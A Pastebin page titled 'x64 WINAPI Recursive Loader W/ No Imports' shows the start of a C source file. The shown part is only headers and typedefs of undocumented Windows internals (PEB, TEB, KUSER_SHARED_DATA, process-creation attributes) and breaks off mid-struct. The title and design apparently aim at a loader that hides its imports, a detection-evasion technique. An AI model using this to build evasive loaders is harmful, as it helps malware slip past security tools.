API tools faq
paste
Advertisement
Guest User

x64 WINAPI Recursive Loader W/ No Imports

a guest
May 24th, 2024
3,129
1
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 78.15 KB | Source Code | 1 0
raw download clone embed print report
  1. #include <Windows.h>
  2. #include "httprequest.h"
  3. #include <Netlistmgr.h>
  4. #include <Wbemidl.h>
  5.  
  6. #pragma comment(lib, "wbemuuid.lib")
  7.  
  8. #pragma comment(linker, "/ENTRY:ApplicationEntryPoint")
  9.  
  10. #ifndef NT_SUCCESS
  11. #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
  12. #endif
  13.  
  14. #define STATUS_SUCCESS 0
  15.  
  16. #define AlignProcessParameters(X, Align) (((ULONG)(X)+(Align)-1UL)&(~((Align)-1UL)))
  17. #define OBJ_HANDLE_TAGBITS 0x00000003L
  18. #define RTL_USER_PROC_CURDIR_INHERIT 0x00000003
  19. #define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001
  20. #define OBJ_CASE_INSENSITIVE 0x00000040
  21. #define FILE_OVERWRITE_IF 0x00000005
  22. #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
  23. #define FILE_NON_DIRECTORY_FILE   0x00000040
  24. #define FILE_OPEN_IF 0x00000003
  25. #define FILE_OPEN 0x00000001
  26.  
  27.  
  28. #define IOCTL_KSEC_RNG CTL_CODE(FILE_DEVICE_KSEC, 1, METHOD_BUFFERED, FILE_ANY_ACCESS)
  29.  
  30. #define InitializeObjectAttributes(p, n, a, r, s) { \
  31.     (p)->Length = sizeof(OBJECT_ATTRIBUTES); \
  32.     (p)->RootDirectory = r; \
  33.     (p)->Attributes = a; \
  34.     (p)->ObjectName = n; \
  35.     (p)->SecurityDescriptor = s; \
  36.     (p)->SecurityQualityOfService = NULL; \
  37. }
  38.  
  39.  
  40. typedef enum _SECTION_INHERIT
  41. {
  42.     ViewShare = 1,
  43.     ViewUnmap = 2
  44.  
  45. } SECTION_INHERIT;
  46.  
  47. typedef struct _LSA_UNICODE_STRING {
  48.     USHORT Length;
  49.     USHORT MaximumLength;
  50.     PWSTR  Buffer;
  51. } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING;
  52.  
  53. typedef struct _LDR_MODULE {
  54.     LIST_ENTRY              InLoadOrderModuleList;
  55.     LIST_ENTRY              InMemoryOrderModuleList;
  56.     LIST_ENTRY              InInitializationOrderModuleList;
  57.     PVOID                   BaseAddress;
  58.     PVOID                   EntryPoint;
  59.     ULONG                   SizeOfImage;
  60.     UNICODE_STRING          FullDllName;
  61.     UNICODE_STRING          BaseDllName;
  62.     ULONG                   Flags;
  63.     SHORT                   LoadCount;
  64.     SHORT                   TlsIndex;
  65.     LIST_ENTRY              HashTableEntry;
  66.     ULONG                   TimeDateStamp;
  67. } LDR_MODULE, * PLDR_MODULE;
  68.  
  69. typedef struct _PEB_LDR_DATA {
  70.     ULONG                   Length;
  71.     ULONG                   Initialized;
  72.     PVOID                   SsHandle;
  73.     LIST_ENTRY              InLoadOrderModuleList;
  74.     LIST_ENTRY              InMemoryOrderModuleList;
  75.     LIST_ENTRY              InInitializationOrderModuleList;
  76. } PEB_LDR_DATA, * PPEB_LDR_DATA;
  77.  
  78. typedef struct _STRING {
  79.     USHORT Length;
  80.     USHORT MaximumLength;
  81.     PCHAR  Buffer;
  82. } ANSI_STRING, * PANSI_STRING;
  83.  
  84. typedef struct _CURDIR {
  85.     UNICODE_STRING DosPath;
  86.     PVOID Handle;
  87. }CURDIR, * PCURDIR;
  88.  
  89. typedef struct _RTL_DRIVE_LETTER_CURDIR {
  90.     WORD Flags;
  91.     WORD Length;
  92.     ULONG TimeStamp;
  93.     ANSI_STRING DosPath;
  94. } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
  95.  
  96. typedef struct _RTL_USER_PROCESS_PARAMETERS {
  97.     ULONG MaximumLength;
  98.     ULONG Length;
  99.     ULONG Flags;
  100.     ULONG DebugFlags;
  101.     PVOID ConsoleHandle;
  102.     ULONG ConsoleFlags;
  103.     PVOID StandardInput;
  104.     PVOID StandardOutput;
  105.     PVOID StandardError;
  106.     CURDIR CurrentDirectory;
  107.     UNICODE_STRING DllPath;
  108.     UNICODE_STRING ImagePathName;
  109.     UNICODE_STRING CommandLine;
  110.     PVOID Environment;
  111.     ULONG StartingX;
  112.     ULONG StartingY;
  113.     ULONG CountX;
  114.     ULONG CountY;
  115.     ULONG CountCharsX;
  116.     ULONG CountCharsY;
  117.     ULONG FillAttribute;
  118.     ULONG WindowFlags;
  119.     ULONG ShowWindowFlags;
  120.     UNICODE_STRING WindowTitle;
  121.     UNICODE_STRING DesktopInfo;
  122.     UNICODE_STRING ShellInfo;
  123.     UNICODE_STRING RuntimeData;
  124.     RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];
  125.     ULONG EnvironmentSize;
  126.     PVOID PackageDependencyData;
  127.     ULONG ProcessGroupId;
  128.     ULONG LoaderThreads;
  129.     UNICODE_STRING RedirectionDllName;
  130.     UNICODE_STRING HeapPartitionName;
  131.     ULONGLONG* DefaultThreadpoolCpuSetMasks;
  132.     ULONG DefaultThreadpoolCpuSetMaskCount;
  133.     PVOID Alignment[4];
  134. }RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
  135.  
  136. typedef struct _PEB {
  137.     BOOLEAN                 InheritedAddressSpace;
  138.     BOOLEAN                 ReadImageFileExecOptions;
  139.     BOOLEAN                 BeingDebugged;
  140.     BOOLEAN                 Spare;
  141.     HANDLE                  Mutant;
  142.     PVOID                   ImageBase;
  143.     PPEB_LDR_DATA           LoaderData;
  144.     PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  145.     PVOID                   SubSystemData;
  146.     PVOID                   ProcessHeap;
  147.     PVOID                   FastPebLock;
  148.     PVOID                   FastPebLockRoutine;
  149.     PVOID                   FastPebUnlockRoutine;
  150.     ULONG                   EnvironmentUpdateCount;
  151.     PVOID* KernelCallbackTable;
  152.     PVOID                   EventLogSection;
  153.     PVOID                   EventLog;
  154.     PVOID                   FreeList;
  155.     ULONG                   TlsExpansionCounter;
  156.     PVOID                   TlsBitmap;
  157.     ULONG                   TlsBitmapBits[0x2];
  158.     PVOID                   ReadOnlySharedMemoryBase;
  159.     PVOID                   ReadOnlySharedMemoryHeap;
  160.     PVOID* ReadOnlyStaticServerData;
  161.     PVOID                   AnsiCodePageData;
  162.     PVOID                   OemCodePageData;
  163.     PVOID                   UnicodeCaseTableData;
  164.     ULONG                   NumberOfProcessors;
  165.     ULONG                   NtGlobalFlag;
  166.     BYTE                    Spare2[0x4];
  167.     LARGE_INTEGER           CriticalSectionTimeout;
  168.     ULONG                   HeapSegmentReserve;
  169.     ULONG                   HeapSegmentCommit;
  170.     ULONG                   HeapDeCommitTotalFreeThreshold;
  171.     ULONG                   HeapDeCommitFreeBlockThreshold;
  172.     ULONG                   NumberOfHeaps;
  173.     ULONG                   MaximumNumberOfHeaps;
  174.     PVOID** ProcessHeaps;
  175.     PVOID                   GdiSharedHandleTable;
  176.     PVOID                   ProcessStarterHelper;
  177.     PVOID                   GdiDCAttributeList;
  178.     PVOID                   LoaderLock;
  179.     ULONG                   OSMajorVersion;
  180.     ULONG                   OSMinorVersion;
  181.     ULONG                   OSBuildNumber;
  182.     ULONG                   OSPlatformId;
  183.     ULONG                   ImageSubSystem;
  184.     ULONG                   ImageSubSystemMajorVersion;
  185.     ULONG                   ImageSubSystemMinorVersion;
  186.     ULONG                   GdiHandleBuffer[0x22];
  187.     ULONG                   PostProcessInitRoutine;
  188.     ULONG                   TlsExpansionBitmap;
  189.     BYTE                    TlsExpansionBitmapBits[0x80];
  190.     ULONG                   SessionId;
  191. } PEB, * PPEB;
  192.  
  193. typedef struct __CLIENT_ID {
  194.     HANDLE UniqueProcess;
  195.     HANDLE UniqueThread;
  196. }CLIENT_ID, * PCLIENT_ID;
  197.  
  198. typedef PVOID PACTIVATION_CONTEXT;
  199.  
  200. typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
  201.     struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
  202.     PACTIVATION_CONTEXT ActivationContext;
  203.     ULONG Flags;
  204. } RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
  205.  
  206. typedef struct _ACTIVATION_CONTEXT_STACK {
  207.     PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
  208.     LIST_ENTRY FrameListCache;
  209.     ULONG Flags;
  210.     ULONG NextCookieSequenceNumber;
  211.     ULONG StackId;
  212. } ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
  213.  
  214. typedef struct _GDI_TEB_BATCH {
  215.     ULONG Offset;
  216.     ULONG HDC;
  217.     ULONG Buffer[310];
  218. } GDI_TEB_BATCH, * PGDI_TEB_BATCH;
  219.  
  220. typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
  221.     ULONG Flags;
  222.     PCHAR FrameName;
  223. } TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
  224.  
  225. typedef struct _TEB_ACTIVE_FRAME {
  226.     ULONG Flags;
  227.     struct _TEB_ACTIVE_FRAME* Previous;
  228.     PTEB_ACTIVE_FRAME_CONTEXT Context;
  229. } TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
  230.  
  231. typedef struct _TEB
  232. {
  233.     NT_TIB              NtTib;
  234.     PVOID               EnvironmentPointer;
  235.     CLIENT_ID           ClientId;
  236.     PVOID               ActiveRpcHandle;
  237.     PVOID               ThreadLocalStoragePointer;
  238.     PPEB                ProcessEnvironmentBlock;
  239.     ULONG               LastErrorValue;
  240.     ULONG               CountOfOwnedCriticalSections;
  241.     PVOID               CsrClientThread;
  242.     PVOID               Win32ThreadInfo;
  243.     ULONG               User32Reserved[26];
  244.     ULONG               UserReserved[5];
  245.     PVOID               WOW32Reserved;
  246.     LCID                CurrentLocale;
  247.     ULONG               FpSoftwareStatusRegister;
  248.     PVOID               SystemReserved1[54];
  249.     LONG                ExceptionCode;
  250. #if (NTDDI_VERSION >= NTDDI_LONGHORN)
  251.     PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
  252.     UCHAR                  SpareBytes1[0x30 - 3 * sizeof(PVOID)];
  253.     ULONG                  TxFsContext;
  254. #elif (NTDDI_VERSION >= NTDDI_WS03)
  255.     PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
  256.     UCHAR                  SpareBytes1[0x34 - 3 * sizeof(PVOID)];
  257. #else
  258.     ACTIVATION_CONTEXT_STACK ActivationContextStack;
  259.     UCHAR                  SpareBytes1[24];
  260. #endif
  261.     GDI_TEB_BATCH           GdiTebBatch;
  262.     CLIENT_ID               RealClientId;
  263.     PVOID                   GdiCachedProcessHandle;
  264.     ULONG                   GdiClientPID;
  265.     ULONG                   GdiClientTID;
  266.     PVOID                   GdiThreadLocalInfo;
  267.     PSIZE_T                 Win32ClientInfo[62];
  268.     PVOID                   glDispatchTable[233];
  269.     PSIZE_T                 glReserved1[29];
  270.     PVOID                   glReserved2;
  271.     PVOID                   glSectionInfo;
  272.     PVOID                   glSection;
  273.     PVOID                   glTable;
  274.     PVOID                   glCurrentRC;
  275.     PVOID                   glContext;
  276.     NTSTATUS                LastStatusValue;
  277.     UNICODE_STRING          StaticUnicodeString;
  278.     WCHAR                   StaticUnicodeBuffer[261];
  279.     PVOID                   DeallocationStack;
  280.     PVOID                   TlsSlots[64];
  281.     LIST_ENTRY              TlsLinks;
  282.     PVOID                   Vdm;
  283.     PVOID                   ReservedForNtRpc;
  284.     PVOID                   DbgSsReserved[2];
  285. #if (NTDDI_VERSION >= NTDDI_WS03)
  286.     ULONG                   HardErrorMode;
  287. #else
  288.     ULONG                  HardErrorsAreDisabled;
  289. #endif
  290. #if (NTDDI_VERSION >= NTDDI_LONGHORN)
  291.     PVOID                   Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
  292.     GUID                    ActivityId;
  293.     PVOID                   SubProcessTag;
  294.     PVOID                   EtwLocalData;
  295.     PVOID                   EtwTraceData;
  296. #elif (NTDDI_VERSION >= NTDDI_WS03)
  297.     PVOID                   Instrumentation[14];
  298.     PVOID                   SubProcessTag;
  299.     PVOID                   EtwLocalData;
  300. #else
  301.     PVOID                   Instrumentation[16];
  302. #endif
  303.     PVOID                   WinSockData;
  304.     ULONG                   GdiBatchCount;
  305. #if (NTDDI_VERSION >= NTDDI_LONGHORN)
  306.     BOOLEAN                SpareBool0;
  307.     BOOLEAN                SpareBool1;
  308.     BOOLEAN                SpareBool2;
  309. #else
  310.     BOOLEAN                InDbgPrint;
  311.     BOOLEAN                FreeStackOnTermination;
  312.     BOOLEAN                HasFiberData;
  313. #endif
  314.     UCHAR                  IdealProcessor;
  315. #if (NTDDI_VERSION >= NTDDI_WS03)
  316.     ULONG                  GuaranteedStackBytes;
  317. #else
  318.     ULONG                  Spare3;
  319. #endif
  320.     PVOID                  ReservedForPerf;
  321.     PVOID                  ReservedForOle;
  322.     ULONG                  WaitingOnLoaderLock;
  323. #if (NTDDI_VERSION >= NTDDI_LONGHORN)
  324.     PVOID                  SavedPriorityState;
  325.     ULONG_PTR              SoftPatchPtr1;
  326.     ULONG_PTR              ThreadPoolData;
  327. #elif (NTDDI_VERSION >= NTDDI_WS03)
  328.     ULONG_PTR              SparePointer1;
  329.     ULONG_PTR              SoftPatchPtr1;
  330.     ULONG_PTR              SoftPatchPtr2;
  331. #else
  332.     Wx86ThreadState        Wx86Thread;
  333. #endif
  334.     PVOID* TlsExpansionSlots;
  335. #if defined(_WIN64) && !defined(EXPLICIT_32BIT)
  336.     PVOID                  DeallocationBStore;
  337.     PVOID                  BStoreLimit;
  338. #endif
  339.     ULONG                  ImpersonationLocale;
  340.     ULONG                  IsImpersonating;
  341.     PVOID                  NlsCache;
  342.     PVOID                  pShimData;
  343.     ULONG                  HeapVirtualAffinity;
  344.     HANDLE                 CurrentTransactionHandle;
  345.     PTEB_ACTIVE_FRAME      ActiveFrame;
  346. #if (NTDDI_VERSION >= NTDDI_WS03)
  347.     PVOID FlsData;
  348. #endif
  349. #if (NTDDI_VERSION >= NTDDI_LONGHORN)
  350.     PVOID PreferredLangauges;
  351.     PVOID UserPrefLanguages;
  352.     PVOID MergedPrefLanguages;
  353.     ULONG MuiImpersonation;
  354.     union
  355.     {
  356.         struct
  357.         {
  358.             USHORT SpareCrossTebFlags : 16;
  359.         };
  360.         USHORT CrossTebFlags;
  361.     };
  362.     union
  363.     {
  364.         struct
  365.         {
  366.             USHORT DbgSafeThunkCall : 1;
  367.             USHORT DbgInDebugPrint : 1;
  368.             USHORT DbgHasFiberData : 1;
  369.             USHORT DbgSkipThreadAttach : 1;
  370.             USHORT DbgWerInShipAssertCode : 1;
  371.             USHORT DbgIssuedInitialBp : 1;
  372.             USHORT DbgClonedThread : 1;
  373.             USHORT SpareSameTebBits : 9;
  374.         };
  375.         USHORT SameTebFlags;
  376.     };
  377.     PVOID TxnScopeEntercallback;
  378.     PVOID TxnScopeExitCAllback;
  379.     PVOID TxnScopeContext;
  380.     ULONG LockCount;
  381.     ULONG ProcessRundown;
  382.     ULONG64 LastSwitchTime;
  383.     ULONG64 TotalSwitchOutTime;
  384.     LARGE_INTEGER WaitReasonBitMap;
  385. #else
  386.     BOOLEAN SafeThunkCall;
  387.     BOOLEAN BooleanSpare[3];
  388. #endif
  389. } TEB, * PTEB;
  390.  
  391. typedef struct _KSYSTEM_TIME
  392. {
  393.     ULONG LowPart;
  394.     LONG High1Time;
  395.     LONG High2Time;
  396. } KSYSTEM_TIME, * PKSYSTEM_TIME;
  397.  
  398. typedef enum _NT_PRODUCT_TYPE
  399. {
  400.     NtProductWinNt = 1,
  401.     NtProductLanManNt = 2,
  402.     NtProductServer = 3
  403. } NT_PRODUCT_TYPE;
  404.  
  405. typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE
  406. {
  407.     StandardDesign = 0,
  408.     NEC98x86 = 1,
  409.     EndAlternatives = 2
  410. } ALTERNATIVE_ARCHITECTURE_TYPE;
  411.  
  412. typedef struct _KUSER_SHARED_DATA {
  413.     ULONG                         TickCountLowDeprecated;
  414.     ULONG                         TickCountMultiplier;
  415.     KSYSTEM_TIME                  InterruptTime;
  416.     KSYSTEM_TIME                  SystemTime;
  417.     KSYSTEM_TIME                  TimeZoneBias;
  418.     USHORT                        ImageNumberLow;
  419.     USHORT                        ImageNumberHigh;
  420.     WCHAR                         NtSystemRoot[260];
  421.     ULONG                         MaxStackTraceDepth;
  422.     ULONG                         CryptoExponent;
  423.     ULONG                         TimeZoneId;
  424.     ULONG                         LargePageMinimum;
  425.     ULONG                         AitSamplingValue;
  426.     ULONG                         AppCompatFlag;
  427.     ULONGLONG                     RNGSeedVersion;
  428.     ULONG                         GlobalValidationRunlevel;
  429.     LONG                          TimeZoneBiasStamp;
  430.     ULONG                         NtBuildNumber;
  431.     NT_PRODUCT_TYPE               NtProductType;
  432.     BOOLEAN                       ProductTypeIsValid;
  433.     BOOLEAN                       Reserved0[1];
  434.     USHORT                        NativeProcessorArchitecture;
  435.     ULONG                         NtMajorVersion;
  436.     ULONG                         NtMinorVersion;
  437.     BOOLEAN                       ProcessorFeatures[64];
  438.     ULONG                         Reserved1;
  439.     ULONG                         Reserved3;
  440.     ULONG                         TimeSlip;
  441.     ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
  442.     ULONG                         BootId;
  443.     LARGE_INTEGER                 SystemExpirationDate;
  444.     ULONG                         SuiteMask;
  445.     BOOLEAN                       KdDebuggerEnabled;
  446.     union {
  447.         UCHAR MitigationPolicies;
  448.         struct {
  449.             UCHAR NXSupportPolicy : 2;
  450.             UCHAR SEHValidationPolicy : 2;
  451.             UCHAR CurDirDevicesSkippedForDlls : 2;
  452.             UCHAR Reserved : 2;
  453.         };
  454.     };
  455.     USHORT                        CyclesPerYield;
  456.     ULONG                         ActiveConsoleId;
  457.     ULONG                         DismountCount;
  458.     ULONG                         ComPlusPackage;
  459.     ULONG                         LastSystemRITEventTickCount;
  460.     ULONG                         NumberOfPhysicalPages;
  461.     BOOLEAN                       SafeBootMode;
  462.     UCHAR                         VirtualizationFlags;
  463.     UCHAR                         Reserved12[2];
  464.     union {
  465.         ULONG SharedDataFlags;
  466.         struct {
  467.             ULONG DbgErrorPortPresent : 1;
  468.             ULONG DbgElevationEnabled : 1;
  469.             ULONG DbgVirtEnabled : 1;
  470.             ULONG DbgInstallerDetectEnabled : 1;
  471.             ULONG DbgLkgEnabled : 1;
  472.             ULONG DbgDynProcessorEnabled : 1;
  473.             ULONG DbgConsoleBrokerEnabled : 1;
  474.             ULONG DbgSecureBootEnabled : 1;
  475.             ULONG DbgMultiSessionSku : 1;
  476.             ULONG DbgMultiUsersInSessionSku : 1;
  477.             ULONG DbgStateSeparationEnabled : 1;
  478.             ULONG SpareBits : 21;
  479.         } DUMMYSTRUCTNAME2;
  480.     } DUMMYUNIONNAME2;
  481.     ULONG                         DataFlagsPad[1];
  482.     ULONGLONG                     TestRetInstruction;
  483.     LONGLONG                      QpcFrequency;
  484.     ULONG                         SystemCall;
  485.     ULONG                         Reserved2;
  486.     ULONGLONG                     SystemCallPad[2];
  487.     union {
  488.         KSYSTEM_TIME TickCount;
  489.         ULONG64      TickCountQuad;
  490.         struct {
  491.             ULONG ReservedTickCountOverlay[3];
  492.             ULONG TickCountPad[1];
  493.         } DUMMYSTRUCTNAME;
  494.     } DUMMYUNIONNAME3;
  495.     ULONG                         Cookie;
  496.     ULONG                         CookiePad[1];
  497.     LONGLONG                      ConsoleSessionForegroundProcessId;
  498.     ULONGLONG                     TimeUpdateLock;
  499.     ULONGLONG                     BaselineSystemTimeQpc;
  500.     ULONGLONG                     BaselineInterruptTimeQpc;
  501.     ULONGLONG                     QpcSystemTimeIncrement;
  502.     ULONGLONG                     QpcInterruptTimeIncrement;
  503.     UCHAR                         QpcSystemTimeIncrementShift;
  504.     UCHAR                         QpcInterruptTimeIncrementShift;
  505.     USHORT                        UnparkedProcessorCount;
  506.     ULONG                         EnclaveFeatureMask[4];
  507.     ULONG                         TelemetryCoverageRound;
  508.     USHORT                        UserModeGlobalLogger[16];
  509.     ULONG                         ImageFileExecutionOptions;
  510.     ULONG                         LangGenerationCount;
  511.     ULONGLONG                     Reserved4;
  512.     ULONGLONG                     InterruptTimeBias;
  513.     ULONGLONG                     QpcBias;
  514.     ULONG                         ActiveProcessorCount;
  515.     UCHAR                         ActiveGroupCount;
  516.     UCHAR                         Reserved9;
  517.     union {
  518.         USHORT QpcData;
  519.         struct {
  520.             UCHAR QpcBypassEnabled;
  521.             UCHAR QpcShift;
  522.         };
  523.     };
  524.     LARGE_INTEGER                 TimeZoneBiasEffectiveStart;
  525.     LARGE_INTEGER                 TimeZoneBiasEffectiveEnd;
  526.     XSTATE_CONFIGURATION          XState;
  527.     KSYSTEM_TIME                  FeatureConfigurationChangeStamp;
  528.     ULONG                         Spare;
  529. } KUSER_SHARED_DATA, * PKUSER_SHARED_DATA;
  530.  
  531. typedef enum _FILE_INFORMATION_CLASS {
  532.     FileDirectoryInformation = 1,
  533.     FileFullDirectoryInformation,                   // 2
  534.     FileBothDirectoryInformation,                   // 3
  535.     FileBasicInformation,                           // 4
  536.     FileStandardInformation,                        // 5
  537.     FileInternalInformation,                        // 6
  538.     FileEaInformation,                              // 7
  539.     FileAccessInformation,                          // 8
  540.     FileNameInformation,                            // 9
  541.     FileRenameInformation,                          // 10
  542.     FileLinkInformation,                            // 11
  543.     FileNamesInformation,                           // 12
  544.     FileDispositionInformation,                     // 13
  545.     FilePositionInformation,                        // 14
  546.     FileFullEaInformation,                          // 15
  547.     FileModeInformation,                            // 16
  548.     FileAlignmentInformation,                       // 17
  549.     FileAllInformation,                             // 18
  550.     FileAllocationInformation,                      // 19
  551.     FileEndOfFileInformation,                       // 20
  552.     FileAlternateNameInformation,                   // 21
  553.     FileStreamInformation,                          // 22
  554.     FilePipeInformation,                            // 23
  555.     FilePipeLocalInformation,                       // 24
  556.     FilePipeRemoteInformation,                      // 25
  557.     FileMailslotQueryInformation,                   // 26
  558.     FileMailslotSetInformation,                     // 27
  559.     FileCompressionInformation,                     // 28
  560.     FileObjectIdInformation,                        // 29
  561.     FileCompletionInformation,                      // 30
  562.     FileMoveClusterInformation,                     // 31
  563.     FileQuotaInformation,                           // 32
  564.     FileReparsePointInformation,                    // 33
  565.     FileNetworkOpenInformation,                     // 34
  566.     FileAttributeTagInformation,                    // 35
  567.     FileTrackingInformation,                        // 36
  568.     FileIdBothDirectoryInformation,                 // 37
  569.     FileIdFullDirectoryInformation,                 // 38
  570.     FileValidDataLengthInformation,                 // 39
  571.     FileShortNameInformation,                       // 40
  572.     FileIoCompletionNotificationInformation,        // 41
  573.     FileIoStatusBlockRangeInformation,              // 42
  574.     FileIoPriorityHintInformation,                  // 43
  575.     FileSfioReserveInformation,                     // 44
  576.     FileSfioVolumeInformation,                      // 45
  577.     FileHardLinkInformation,                        // 46
  578.     FileProcessIdsUsingFileInformation,             // 47
  579.     FileNormalizedNameInformation,                  // 48
  580.     FileNetworkPhysicalNameInformation,             // 49
  581.     FileIdGlobalTxDirectoryInformation,             // 50
  582.     FileIsRemoteDeviceInformation,                  // 51
  583.     FileUnusedInformation,                          // 52
  584.     FileNumaNodeInformation,                        // 53
  585.     FileStandardLinkInformation,                    // 54
  586.     FileRemoteProtocolInformation,                  // 55
  587.     FileRenameInformationBypassAccessCheck,         // 56
  588.     FileLinkInformationBypassAccessCheck,           // 57
  589.     FileVolumeNameInformation,                      // 58
  590.     FileIdInformation,                              // 59
  591.     FileIdExtdDirectoryInformation,                 // 60
  592.     FileReplaceCompletionInformation,               // 61
  593.     FileHardLinkFullIdInformation,                  // 62
  594.     FileIdExtdBothDirectoryInformation,             // 63
  595.     FileDispositionInformationEx,                   // 64
  596.     FileRenameInformationEx,                        // 65
  597.     FileRenameInformationExBypassAccessCheck,       // 66
  598.     FileDesiredStorageClassInformation,             // 67
  599.     FileStatInformation,                            // 68
  600.     FileMemoryPartitionInformation,                 // 69
  601.     FileStatLxInformation,                          // 70
  602.     FileCaseSensitiveInformation,                   // 71
  603.     FileLinkInformationEx,                          // 72
  604.     FileLinkInformationExBypassAccessCheck,         // 73
  605.     FileStorageReserveIdInformation,                // 74
  606.     FileCaseSensitiveInformationForceAccessCheck,   // 75
  607.     FileMaximumInformation
  608. } FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;
  609.  
  610. typedef struct _IO_STATUS_BLOCK {
  611.     union {
  612.         NTSTATUS Status;
  613.         PVOID    Pointer;
  614.     };
  615.     ULONG_PTR Information;
  616. } IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;
  617.  
  618. typedef struct _OBJECT_ATTRIBUTES
  619. {
  620.     ULONG Length;
  621.     PVOID RootDirectory;
  622.     PUNICODE_STRING ObjectName;
  623.     ULONG Attributes;
  624.     PVOID SecurityDescriptor;
  625.     PVOID SecurityQualityOfService;
  626. } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
  627.  
  628. typedef struct _RTLP_CURDIR_REF* PRTLP_CURDIR_REF;
  629.  
  630. typedef struct _RTL_RELATIVE_NAME_U {
  631.     UNICODE_STRING RelativeName;
  632.     HANDLE ContainingDirectory;
  633.     PRTLP_CURDIR_REF CurDirRef;
  634. } RTL_RELATIVE_NAME_U, * PRTL_RELATIVE_NAME_U;
  635.  
  636. #define PS_ATTRIBUTE_NUMBER_MASK    0x0000ffff
  637. #define PS_ATTRIBUTE_THREAD         0x00010000
  638. #define PS_ATTRIBUTE_INPUT          0x00020000
  639. #define PS_ATTRIBUTE_ADDITIVE       0x00040000
  640.  
  641. typedef enum _PS_ATTRIBUTE_NUM
  642. {
  643.     PsAttributeParentProcess,
  644.     PsAttributeDebugPort,
  645.     PsAttributeToken,
  646.     PsAttributeClientId,
  647.     PsAttributeTebAddress,
  648.     PsAttributeImageName,
  649.     PsAttributeImageInfo,
  650.     PsAttributeMemoryReserve,
  651.     PsAttributePriorityClass,
  652.     PsAttributeErrorMode,
  653.     PsAttributeStdHandleInfo,
  654.     PsAttributeHandleList,
  655.     PsAttributeGroupAffinity,
  656.     PsAttributePreferredNode,
  657.     PsAttributeIdealProcessor,
  658.     PsAttributeUmsThread,
  659.     PsAttributeMitigationOptions,
  660.     PsAttributeProtectionLevel,
  661.     PsAttributeSecureProcess,
  662.     PsAttributeJobList,
  663.     PsAttributeChildProcessPolicy,
  664.     PsAttributeAllApplicationPackagesPolicy,
  665.     PsAttributeWin32kFilter,
  666.     PsAttributeSafeOpenPromptOriginClaim,
  667.     PsAttributeBnoIsolation,
  668.     PsAttributeDesktopAppPolicy,
  669.     PsAttributeMax
  670. } PS_ATTRIBUTE_NUM;
  671.  
  672. #define PsAttributeValue(Number, Thread, Input, Additive) \
  673.     (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \
  674.     ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \
  675.     ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \
  676.     ((Additive) ? PS_ATTRIBUTE_ADDITIVE : 0))
  677.  
  678. #define RTL_USER_PROCESS_PARAMETERS_NORMALIZED              0x01
  679. #define PS_ATTRIBUTE_IMAGE_NAME \
  680.     PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE)
  681.  
  682. typedef struct _PS_ATTRIBUTE
  683. {
  684.     ULONG_PTR Attribute;
  685.     SIZE_T Size;
  686.     union
  687.     {
  688.         ULONG_PTR Value;
  689.         PVOID ValuePtr;
  690.     };
  691.     PSIZE_T ReturnLength;
  692. } PS_ATTRIBUTE, * PPS_ATTRIBUTE;
  693.  
  694. typedef struct _PS_ATTRIBUTE_LIST
  695. {
  696.     SIZE_T TotalLength;
  697.     PS_ATTRIBUTE Attributes[2];
  698. } PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;
  699.  
  700. typedef enum _PS_CREATE_STATE
  701. {
  702.     PsCreateInitialState,
  703.     PsCreateFailOnFileOpen,
  704.     PsCreateFailOnSectionCreate,
  705.     PsCreateFailExeFormat,
  706.     PsCreateFailMachineMismatch,
  707.     PsCreateFailExeName,
  708.     PsCreateSuccess,
  709.     PsCreateMaximumStates
  710. } PS_CREATE_STATE;
  711.  
  712. typedef struct _PS_CREATE_INFO {
  713.     SIZE_T Size;
  714.     PS_CREATE_STATE State;
  715.     union {
  716.         struct {
  717.             union {
  718.                 ULONG InitFlags;
  719.                 struct {
  720.                     UCHAR WriteOutputOnExit : 1;
  721.                     UCHAR DetectManifest : 1;
  722.                     UCHAR IFEOSkipDebugger : 1;
  723.                     UCHAR IFEODoNotPropagateKeyState : 1;
  724.                     UCHAR SpareBits1 : 4;
  725.                     UCHAR SpareBits2 : 8;
  726.                     USHORT ProhibitedImageCharacteristics : 16;
  727.                 } s1;
  728.             } u1;
  729.             ACCESS_MASK AdditionalFileAccess;
  730.         } InitState;
  731.         struct { HANDLE FileHandle; } FailSection;
  732.         struct { USHORT DllCharacteristics; } ExeFormat;
  733.         struct { HANDLE IFEOKey; } ExeName;
  734.         struct {
  735.             union {
  736.                 ULONG OutputFlags;
  737.                 struct {
  738.                     UCHAR ProtectedProcess : 1;
  739.                     UCHAR AddressSpaceOverride : 1;
  740.                     UCHAR DevOverrideEnabled : 1;
  741.                     UCHAR ManifestDetected : 1;
  742.                     UCHAR ProtectedProcessLight : 1;
  743.                     UCHAR SpareBits1 : 3;
